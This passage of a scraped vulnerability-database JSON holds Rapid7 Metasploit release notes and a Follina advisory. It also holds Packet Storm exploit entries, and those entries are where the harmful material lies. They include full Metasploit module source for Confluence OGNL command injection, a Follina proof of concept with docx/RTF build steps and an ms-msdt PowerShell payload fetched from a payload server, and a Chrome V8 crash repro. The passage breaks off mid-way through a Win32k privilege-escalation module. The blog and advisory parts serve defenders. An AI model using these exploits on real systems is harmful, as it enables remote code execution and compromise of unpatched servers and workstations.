[klezVirus](<https://github.com/klezVirus>), [lockedbyte](<https://github.com/lockedbyte>), [mekhalleh (RAMELLA S\u00e9bastien)](<https://github.com/mekhalleh>), and [thesunRider](<https://github.com/thesunRider>), which exploits [CVE-2021-40444](<https://attackerkb.com/topics/6ojqzQoPox/cve-2021-40444?referrer=blog>) \\- This adds an exploit for CVE-2021-40444 which is a vulnerability that affects Microsoft Word. Successful exploitation results in code execution in the context of the user running Microsoft Word.\n\n## Enhancements and features\n\n * [#15854](<https://github.com/rapid7/metasploit-framework/pull/15854>) from [sjanusz-r7](<https://github.com/sjanusz-r7>) \\- This updates the `SpiderProfiles` option as part of the `scanner/smb/smb_enumshares` module to now work against newer SMB3 targets, such as windows 10, Windows Server 2016, and above.\n * [#15888](<https://github.com/rapid7/metasploit-framework/pull/15888>) from [sjanusz-r7](<https://github.com/sjanusz-r7>) \\- This adds anonymised database statistics to msfconsole's `debug` command, which is used to help developers track down database issues as part of user generated error reports.\n * [#15929](<https://github.com/rapid7/metasploit-framework/pull/15929>) from [bcoles](<https://github.com/bcoles>) \\- This adds nine new Windows 2003 SP2 targets that the `exploit/windows/smb/ms08_067_netapi` module can exploit.\n\n## Bugs fixed\n\n * [#15808](<https://github.com/rapid7/metasploit-framework/pull/15808>) from [timwr](<https://github.com/timwr>) \\- This fixes a compatibility issue with Powershell `read_file` on Windows Server 2012 by using the old style Powershell syntax (New-Object).\n * [#15937](<https://github.com/rapid7/metasploit-framework/pull/15937>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- This removes usage of `SortedSet` to improve support for Ruby 3.\n * [#15939](<https://github.com/rapid7/metasploit-framework/pull/15939>) from [zeroSteiner](<https://github.com/zeroSteiner>) \\- This fixes a bug where the Meterpreter dir/ls function would show the creation date instead of the modified date for the directory contents.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` \nand you can get more details on the changes since the last blog post from \nGitHub:\n\n * [Pull Requests 6.1.17...6.1.19](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222021-12-02T11%3A01%3A28-06%3A00..2021-12-09T08%3A35%3A23%2B00%3A00%22>)\n * [Full diff 6.1.17...6.1.19](<https://github.com/rapid7/metasploit-framework/compare/6.1.17...6.1.19>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. \nTo install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the \n[binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-12-10T21:36:13", "type": "rapid7blog", "title": "Metasploit Wrap-Up", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-12-10T21:36:13", "id": "RAPID7BLOG:AE824D3989C792700A622C455D8EE160", "href": "https://blog.rapid7.com/2021/12/10/metasploit-wrap-up-142/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-02-11T21:27:50", "description": "## Welcome, Little Hippo: PetitPotam\n\n\n\nOur very own [@zeroSteiner](<https://github.com/zeroSteiner>) [ported](<https://github.com/rapid7/metasploit-framework/pull/16136>) the [PetitPotam](<https://github.com/topotam/PetitPotam>) exploit to Metasploit this week. This module leverages [CVE-2021-36942](<https://attackerkb.com/topics/TEBmUAfeCs/cve-2021-36942?referrer=blog>), a vulnerability in the Windows Encrypting File System (EFS) API, to capture machine NTLM hashes. This uses the `EfsRpcOpenFileRaw` function of the Microsoft\u2019s Encrypting File System Remote Protocol API ([MS-EFSRPC](<https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/08796ba8-01c8-4872-9221-1000ec2eff31>)) to coerce machine authentication to a user-controlled listener host. Metasploit's [SMB capture server](<https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/server/capture/smb.rb>) module can be used for this. The captured hashes are typically used as part of a NTLM relaying attack to take over other Windows hosts. Note that Microsoft has published some [guidance](<https://support.microsoft.com/en-us/topic/kb5005413-mitigating-ntlm-relay-attacks-on-active-directory-certificate-services-ad-cs-3612b773-4043-4aa9-b23d-b87910cd3429>) about how to mitigate NTLM relay attacks.\n\n## QEMU Human Monitor Interface RCE\n\nContributor [@bcoles](<https://github.com/bcoles>) added an exploit [module](<https://github.com/rapid7/metasploit-framework/pull/16151>) that abuse QEMU's Monitor Human Monitor Interface (HMP) TCP server to execute arbitrary commands by using the `migrate` HMP command. Furthermore, since the HMP TCP service is reachable from emulated devices, it is possible to escape QEMU from a guest system using this module. Note that it doesn't work on Windows hosts since the `migrate` command cannot spawn processes on this platform.\n\n## New module content (2)\n\n * [PetitPotam](<https://github.com/rapid7/metasploit-framework/pull/16136>) by [GILLES Lionel](<https://github.com/topotam>) and [Spencer McIntyre](<https://github.com/zeroSteiner>), which exploits [CVE-2021-36942](<https://attackerkb.com/topics/TEBmUAfeCs/cve-2021-36942?referrer=blog>) \\- This adds a new auxiliary scanner module that ports the PetitPotam tool to Metasploit andleverages CVE-2021-36942 to coerce Windows hosts to authenticate to a user-specific host, which enables an attacker to capture NTLM credentials for further actions, such as relay attacks.\n * [QEMU Monitor HMP 'migrate' Command Execution](<https://github.com/rapid7/metasploit-framework/pull/16151>) by [bcoles](<https://github.com/bcoles>) \\- This adds a module that can exploit the QEMU HMP service to execute OS commands. The HMP TCP service is reachable from emulated devices, so it is possible to escape QEMU by exploiting this vulnerability.\n\n## Enhancements and features\n\n * [#16010](<https://github.com/rapid7/metasploit-framework/pull/16010>) from [lap1nou](<https://github.com/lap1nou>) \\- This updates the zabbix_script_exec module with support for Zabbix version 5.0 and later. It also adds a new item-based execution technique and support for delivering Linux native payloads.\n * [#16163](<https://github.com/rapid7/metasploit-framework/pull/16163>) from [zeroSteiner](<https://github.com/zeroSteiner>) \\- Support has been added for the ClaimsPrincipal .NET deserialization gadget chain, which was found by [jang](<https://github.com/testanull>). An exploit which utilizes this enhancement will arrive shortly.\n * [#16125](<https://github.com/rapid7/metasploit-framework/pull/16125>) from [bcoles](<https://github.com/bcoles>) \\- This module can exploit GXV3140 models now that an `ARCH_CMD` target has been added.\n\n## Bugs fixed\n\n * [#16121](<https://github.com/rapid7/metasploit-framework/pull/16121>) from [timwr](<https://github.com/timwr>) \\- This fixes an exception caused by exploits that call `rhost()` in `Msf::Post::Common` without a valid session.\n * [#16142](<https://github.com/rapid7/metasploit-framework/pull/16142>) from [timwr](<https://github.com/timwr>) \\- This fixes an issue with Meterpreter's `getenv` command that was not returning `NULL` when querying for a non-existing environment variable.\n * [#16143](<https://github.com/rapid7/metasploit-framework/pull/16143>) from [sjanusz-r7](<https://github.com/sjanusz-r7>) \\- This fixes an issue where a Cygwin SSH session was not correctly identified being a Windows device, due to a case sensitivity issue\n * [#16147](<https://github.com/rapid7/metasploit-framework/pull/16147>) from [zeroSteiner](<https://github.com/zeroSteiner>) \\- This fixes a bug where `ssh_enumusers` would only use one source in the generation of its user word list if both `USERNAME` and `USER_FILE` options were set. The module now pulls from all possible datastore options if they are set, including a new option `DB_ALL_USERS`.\n * [#16160](<https://github.com/rapid7/metasploit-framework/pull/16160>) from [zeroSteiner](<https://github.com/zeroSteiner>) \\- This fixes a crash when `msfconsole` is unable to correctly determine the hostname and current user within a shell prompt.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` \nand you can get more details on the changes since the last blog post from \nGitHub:\n\n * [Pull Requests 6.1.28...6.1.29](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222022-02-03T12%3A28%3A59%2B00%3A00..2022-02-09T14%3A46%3A38-06%3A00%22>)\n * [Full diff 6.1.28...6.1.29](<https://github.com/rapid7/metasploit-framework/compare/6.1.28...6.1.29>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. \nTo install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the \n[binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 5.3, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 1.4}, "published": "2022-02-11T21:07:08", "type": "rapid7blog", "title": "Metasploit Wrap-Up", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36942"], "modified": "2022-02-11T21:07:08", "id": "RAPID7BLOG:D214650E6EFB584624DA76ACB1573C1B", "href": "https://blog.rapid7.com/2022/02/11/metasploit-wrap-up-148/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-06-02T16:48:36", "description": "\n\nOn May 30, 2022, Microsoft Security Response Center (MSRC) [published a blog](<https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/>) on CVE-2022-30190, an unpatched vulnerability in the Microsoft Support Diagnostic Tool (msdt) in Windows. Microsoft\u2019s [advisory](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-30190>) on CVE-2022-30190 indicates that exploitation has been detected in the wild.\n\nAccording to Microsoft, CVE-2022-30190 is a remote code execution vulnerability that exists when MSDT is called using the URL protocol from a calling application such as Word. An attacker who successfully exploits this vulnerability can run arbitrary code with the privileges of the calling application. The attacker can then install programs, view, change, or delete data, or create new accounts in the context allowed by the user\u2019s rights. Workarounds are available in [Microsoft\u2019s blog](<https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/>).\n\nRapid7\u2019s vulnerability research team has a [full technical analysis of CVE-2022-30190 in AttackerKB](<https://attackerkb.com/topics/Z0pUwH0BFV/cve-2022-30190/rapid7-analysis?referrer=blog>). The flaw requires user interaction to exploit, looks similar to many other vulnerabilities that necessitate a user opening or previewing an attachment, and appears to leverage a vector [described in 2020](<https://benjamin-altpeter.de/doc/thesis-electron.pdf>). Despite the description, it is not a true \u201cremote code execution\u201d vulnerability.\n\n## Mitigation guidance\n\nIn the absence of a patch, disable the MSDT URL protocol [as specified in Microsoft\u2019s advisory](<https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/>).\n\n## Rapid7 customers\n\nInsightVM and Nexpose customers can assess their exposure to CVE-2022-30190 with an authenticated vulnerability check in the May 31 content release.\n\nInsightIDR customers have a new detection rule added to their library to identify attacks related to this vulnerability:\n\n * Suspicious Process - Microsoft Office App Spawns MSDT.exe\n\nWe recommend that you review your settings for this detection rule and confirm it is turned on and [set to an appropriate rule action and priority for your organization](<https://docs.rapid7.com/insightidr/modify-detection-rules>).\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-05-31T15:15:16", "type": "rapid7blog", "title": "CVE-2022-30190: \"Follina\" Microsoft Support Diagnostic Tool Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-05-31T15:15:16", "id": "RAPID7BLOG:509F3BE1FB927288AB4D3BD9A3090852", "href": "https://blog.rapid7.com/2022/05/31/cve-2022-30190-follina-microsoft-support-diagnostic-tool-vulnerability/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2022-06-08T16:37:11", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-08T00:00:00", "type": "packetstorm", "title": "Atlassian Confluence Namespace OGNL Injection", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084", "CVE-2022-26134"], "modified": "2022-06-08T00:00:00", "id": "PACKETSTORM:167449", "href": "https://packetstormsecurity.com/files/167449/Atlassian-Confluence-Namespace-OGNL-Injection.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \n \nRank = ExcellentRanking \n \nprepend Msf::Exploit::Remote::AutoCheck \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::CmdStager \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Atlassian Confluence Namespace OGNL Injection', \n'Description' => %q{ \nThis module exploits an OGNL injection in Atlassian Confluence servers. A specially crafted URI can be used to \nevaluate an OGNL expression resulting in OS command execution. \n}, \n'Author' => [ \n'Unknown', # exploited in the wild \n'bturner-r7', \n'jbaines-r7', \n'Spencer McIntyre' \n], \n'References' => [ \n['CVE', '2021-26084'], \n['URL', 'https://jira.atlassian.com/browse/CONFSERVER-79000?src=confmacro'], \n['URL', 'https://gist.githubusercontent.com/bturner-r7/1d0b62fac85235b94f1c95cc4c03fcf3/raw/478e53b6f68b5150eefd53e0956f23d53618d250/confluence-exploit.py'], \n['URL', 'https://github.com/jbaines-r7/through_the_wire'], \n['URL', 'https://attackerkb.com/topics/BH1D56ZEhs/cve-2022-26134/rapid7-analysis'] \n], \n'DisclosureDate' => '2022-06-02', \n'License' => MSF_LICENSE, \n'Platform' => ['unix', 'linux'], \n'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64], \n'Privileged' => false, \n'Targets' => [ \n[ \n'Unix Command', \n{ \n'Platform' => 'unix', \n'Arch' => ARCH_CMD, \n'Type' => :cmd \n} \n], \n[ \n'Linux Dropper', \n{ \n'Platform' => 'linux', \n'Arch' => [ARCH_X86, ARCH_X64], \n'Type' => :dropper \n} \n] \n], \n'DefaultTarget' => 0, \n'DefaultOptions' => { \n'RPORT' => 8090 \n}, \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'Reliability' => [REPEATABLE_SESSION], \n'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] \n} \n) \n) \n \nregister_options([ \nOptString.new('TARGETURI', [true, 'Base path', '/']) \n]) \nend \n \ndef check \nversion = get_confluence_version \nreturn CheckCode::Unknown unless version \n \nvprint_status(\"Detected Confluence version: #{version}\") \nheader = \"X-#{Rex::Text.rand_text_alphanumeric(10..15)}\" \nres = inject_ognl('', header: header) # empty command works for testing, the header will be set \n \nreturn CheckCode::Unknown unless res \n \nunless res && res.headers.include?(header) \nreturn CheckCode::Safe('Failed to test OGNL injection.') \nend \n \nCheckCode::Vulnerable('Successfully tested OGNL injection.') \nend \n \ndef get_confluence_version \nreturn @confluence_version if @confluence_version \n \nres = send_request_cgi( \n'method' => 'GET', \n'uri' => normalize_uri(target_uri.path, 'login.action') \n) \nreturn nil unless res&.code == 200 \n \npoweredby = res.get_xml_document.xpath('//ul[@id=\"poweredby\"]/li[@class=\"print-only\"]/text()').first&.text \nreturn nil unless poweredby =~ /Confluence (\\d+(\\.\\d+)*)/ \n \n@confluence_version = Rex::Version.new(Regexp.last_match(1)) \n@confluence_version \nend \n \ndef exploit \nprint_status(\"Executing #{payload_instance.refname} (#{target.name})\") \n \ncase target['Type'] \nwhen :cmd \nexecute_command(payload.encoded) \nwhen :dropper \nexecute_cmdstager \nend \nend \n \ndef execute_command(cmd, _opts = {}) \nheader = \"X-#{Rex::Text.rand_text_alphanumeric(10..15)}\" \nres = inject_ognl(cmd, header: header) \n \nunless res && res.headers.include?(header) \nfail_with(Failure::PayloadFailed, \"Failed to execute command: #{cmd}\") \nend \n \nvprint_good(\"Successfully executed command: #{cmd}\") \nres.headers[header] \nend \n \ndef inject_ognl(cmd, header:) \nsend_request_cgi( \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path, Rex::Text.uri_encode(ognl_payload(cmd, header: header)), 'dashboard.action'), \n'headers' => { header => cmd } \n) \nend \n \ndef ognl_payload(_cmd, header:) \n<<~OGNL.gsub(/^\\s+/, '').tr(\"\\n\", '') \n${ \nClass.forName(\"com.opensymphony.webwork.ServletActionContext\") \n.getMethod(\"getResponse\",null) \n.invoke(null,null) \n.setHeader(\"#{header}\", \nClass.forName(\"javax.script.ScriptEngineManager\") \n.newInstance() \n.getEngineByName(\"js\") \n.eval(\"java.lang.Runtime.getRuntime().exec([ \n#{target['Platform'] == 'win' ? \"'cmd.exe','/c'\" : \"'/bin/sh','-c'\"}, \ncom.opensymphony.webwork.ServletActionContext.getRequest().getHeader('#{header}') \n]); '#{Faker::Internet.uuid}'\") \n) \n} \nOGNL \nend \nend \n`\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/167449/atlassian_confluence_namespace_ognl_injection.rb.txt"}, {"lastseen": "2022-06-20T04:43:33", "description": "", "cvss3": {}, "published": "2022-06-20T00:00:00", "type": "packetstorm", "title": "Chrome CVE-2022-1096 Incomplete Fix", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-1096", "CVE-2022-1232"], "modified": "2022-06-20T00:00:00", "id": "PACKETSTORM:167516", "href": "https://packetstormsecurity.com/files/167516/Chrome-CVE-2022-1096-Incomplete-Fix.html", "sourceData": "`Chrome: Incomplete fix for CVE-2022-1096 \n \nVULNERABILITY DETAILS \nThe fix for https://crbug.com/1309225 has modified `SetPropertyInternal()` to fall back to `SetSuperProperty()` whenever a property access interceptor is encountered because `SetSuperProperty()` is robust against possible side effects caused by interceptors. \n \nUnfortunately, the function `JSObject::DefineOwnPropertyIgnoreAttributes()` is also affected by the bug and requires the same change. \n \n \nVERSION \nGoogle Chrome 100.0.4896.60 (Official Build) (arm64) \nChromium 102.0.4972.0 (Developer Build) (64-bit) \n \n \nREPRODUCTION CASE \nTo make the exploit functional again, the attacker only needs to replace one property store with an `Object.defineProperty()` call: \n \n``` \n<script> \nstyle = document.createElement('p').style; \nObject.defineProperty(style, 'prop', { \nvalue: { toString() { style.prop = 1 } } \n}); \n</script> \n``` \n \nThe repro case above triggers the same DCHECK failure: \n \n``` \n# \n# Fatal error in ../../v8/src/objects/map.cc, line 437 \n# Debug check failed: map->instance_descriptors(isolate) .Search(*name, map->NumberOfOwnDescriptors()) .is_not_found(). \n# \n``` \n \nCREDIT INFORMATION \nSergei Glazunov of Google Project Zero \n \n \nThis bug is subject to a 90-day disclosure deadline. If a fix for this \nissue is made available to users before the end of the 90-day deadline, \nthis bug report will become public 30 days after the fix was made \navailable. Otherwise, this bug report will become public at the deadline. \nThe scheduled deadline is 2022-06-28. \n \n \nRelated CVE Numbers: CVE-2022-1232,CVE-2022-1096. \n \n \n \nFound by: glazunov@google.com \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/167516/GS20220620005024.txt"}, {"lastseen": "2022-05-31T17:41:58", "description": "", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-05-31T00:00:00", "type": "packetstorm", "title": "Microsoft Office MSDT Follina Proof Of Concept", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444", "CVE-2021-44444", "CVE-2022-30190"], "modified": "2022-05-31T00:00:00", "id": "PACKETSTORM:167317", "href": "https://packetstormsecurity.com/files/167317/Microsoft-Office-MSDT-Follina-Proof-Of-Concept.html", "sourceData": "`# POC CVE-2022-30190 : CVE 0-day MS Offic RCE aka msdt follina \n \n> Info : [New Microsoft Office zero-day used in attacks to execute PowerShell](https://www.bleepingcomputer.com/news/security/new-microsoft-office-zero-day-used-in-attacks-to-execute-powershell/) \n \n## Summary \n \nOn the 29th of May 2022, the Nao_Sec team, an independent Cyber Security Research \nTeam, discovered a malicious Office document shared on Virustotal. This document is \nusing an unusual, but known scheme to infect its victims. The scheme was not detected as \nmalicious by some EDR, like Microsoft Defender for Endpoint. This vulnerability could lead to \ncode execution without the need of user interaction, as it does not involve macros, except if the \nProtected View mode is enabled. There is no CVE number attributed yet. \n \n \n## Technical Details \n \nThe vulnerability is being exploited by using the MSProtocol URI scheme to load some code. \nAttackers could embed malicious links inside Microsoft Office documents, templates or emails \nbeginning with ms-msdt: that will be loaded and executed afterward without user interaction \n- except if the Protected View mode is enabled. Nevertheless, converting the document to \nthe RTF format could also bypass the Protected View feature. \n \n## Proof of Concept \n \nMS Office docx files may contain external OLE Object references as HTML files. There is an HTML sceme \"ms-msdt:\" which invokes the msdt diagnostic tool, what is capable of executing arbitrary code (specified in parameters). \n \nThe result is a terrifying attack vector for getting RCE through opening malicious docx files (without using macros). \n \nHere are the steps to build a Proof-of-Concept docx: \n \n1. Open Word (used up-to-date 2019 Pro, 16.0.10386.20017), create a dummy document, insert an (OLE) object (as a Bitmap Image), save it in docx. \n \n2. Edit `word/_rels/document.xml.rels` in the docx structure (it is a plain zip). Modify the XML tag `<Relationship>` with attribute \n \n``` \nType=\"http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject\" \n``` \n \nand `Target=\"embeddings/oleObject1.bin\"` by changing the `Target` value and adding attribute `TargetMode`: \n \n``` \nTarget = \"http://<payload_server>/payload.html!\" \nTargetMode = \"External\" \n``` \n \nNote the Id value (probably it is \"rId5\"). \n \n3. Edit `word/document.xml`. Search for the \"<o:OLEObject ..>\" tag (with `r:id=\"rId5\"`) and change the attribute from `Type=\"Embed\"` to `Type=\"Link\"` and add the attribute `UpdateMode=\"OnCall\"`. \n \nNOTE: The created malicious docx is almost the same as for [CVE-2021-44444](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444). \n \n4. Serve the PoC (calc.exe launcher) html payload with the ms-msdt scheme at `http://<payload_server>/payload.html`: \n \n``` \n<!doctype html> \n<html lang=\"en\"> \n<body> \n<script> \n//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA should be repeated >60 times \nwindow.location.href = \"ms-msdt:/id PCWDiagnostic /skip force /param \\\"IT_RebrowseForFile=cal?c IT_SelectProgram=NotListed IT_BrowseForFile=h$(IEX('calc.exe'))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe \\\"\"; \n</script> \n \n</body> \n</html> \n``` \n \nNote that the comment line with AAA should be repeated >60 times (for filling up enough space to trigger the payload for some reason). \n \n## BONUS (0-click RTF version) \n \nIf you also add these elements under the `<o:OLEObject>` element in `word/document.xml` at step 3: \n \n``` \n<o:LinkType>EnhancedMetaFile</o:LinkType> \n<o:LockedField>false</o:LockedField> \n<o:FieldCodes>\\f 0</o:FieldCodes> \n``` \n \nthen it'll work as RTF also (open the resulting docx and save it as RTF). \n \nWith RTF, there is no need to open the file in Word, it is enough to browse to the file and have a look at it in a preview pane. The preview pane triggers the external HTML payload and RCE is there without any clicks. \n \n## Sources : \n \n- https://nao-sec.org/about \n- https://www.virustotal.com/gui/file/4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784/detection \n- https://gist.github.com/tothi/66290a42896a97920055e50128c9f040 \n- https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/ \n \n \n`\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/167317/msdt-poc.txt"}, {"lastseen": "2022-02-28T16:54:53", "description": "", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2022-02-28T00:00:00", "type": "packetstorm", "title": "Win32k ConsoleControl Offset Confusion / Privilege Escalation", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-7255", "CVE-2021-1732", "CVE-2022-21882"], "modified": "2022-02-28T00:00:00", "id": "PACKETSTORM:166169", "href": "https://packetstormsecurity.com/files/166169/Win32k-ConsoleControl-Offset-Confusion-Privilege-Escalation.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Local \nRank = AverageRanking \n \ninclude Msf::Post::File \ninclude Msf::Post::Windows::Priv \ninclude Msf::Post::Windows::Process \ninclude 